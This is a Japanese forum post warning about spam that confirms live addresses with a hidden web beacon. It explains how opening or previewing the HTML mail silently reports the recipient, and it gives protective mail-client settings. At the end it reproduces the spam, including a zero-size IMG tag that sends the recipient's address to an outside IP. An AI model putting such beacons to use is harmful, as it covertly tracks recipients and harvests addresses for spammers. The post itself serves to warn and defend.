ID-code:SBmVS.qlfOU（本記事は投稿者自身により10/01-17:48に修正されました）

Zeitです。

海外発の英文(というほどでもない)ですが、思い切りビーコン入りの「有効アドレス確認」のスパムです。エンコードすらされておらず、生でアドレスが入っていました。
しかも、HTMLが読める方ならおわかりと思いますが、本文のURLをクリックするのではなく「メールを開いただけで情報が送信される」ようになっています(Outlook系のデフォルト設定では、みごとに情報が飛びます)。

たとえばOutlook系など、HTMLメールの表示ができるメールソフトで「HTMLの自動表示」をしていると、メールを開いたとたんにスパム発信元に「このアドレスのメールが表示された＝人間が読んでいる有効アドレスである」ことがわかるしくみになっています(プレビューだけでも情報が飛びます)。
もちろん、HTML添付形式の設定でも、うっかり開いてしまうと同じです。

さらにたちが悪いのは、このスパムは「情報が送信された」ことが、一見わからないようになっていることです。
しくみとしては「見えない画像を“表示”させる際、その画像のURLに“宛先のメールアドレス”をくっつけておき、メールを開いた宛先アドレスがわかる」ようになっています。
このメールをHTML表示で開くと、「xxxxWho are you」とだけ表示されますが、実はその右に「見えない画像」があり、その画像のURLにビーコンが仕込まれている、ということです。

非常に悪質で、危険なものです。

件名に宛先メールアドレスの一部が入っているのが特徴で、たとえば
nippon＠japan.ne.jp
というアドレス宛だと、
Subject: nipponWho are you
となっています。こういった件名のメールには、十分ご注意ください。

とりあえず、Outlook系のメールソフトであれば
・プレビューはしない。
・HTML形式での表示はしない(テキスト形式のみで表示)。
という設定を必ずしておきましょう(具体的な設定方法は各自で検索を)。
＃ これだけでは完全ではありませんが、だいぶ安全度が増します。

ちなみに、発信元もビーコンのURLも、中国CHINANETでした。

以下メール本体ですが、“###”の部分には、メールアドレスの＠の左側の文字列が入っていました。SpamCop報告済です。
----------------------------------------------------------------------------
Return-Path: kamqh.kamqh＠aisai.com.cn
Date: Thu, 1 Nov 2035 15:42:46 +0800
From: "WWWW" <kalkq.kalkq＠aisai.com.cn>
To: ###＠***
Subject: ###Who are you
Received: from yahoo.com.cn ([220.163.92.15])by *** with SMTP id *****
for <###＠***>; Sat, 1 Oct 2005 16:46:08 +0900
Message-Id: <200510010746.*****＠***>
Content-Type: text/html
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2112.0000

###Who are you
<IMG SRC="ttp://220.163.176.206:7382/AD.png?eid=###＠***&pid=banban" HEIGHT="0" WEIGHT="0" BORDER="0">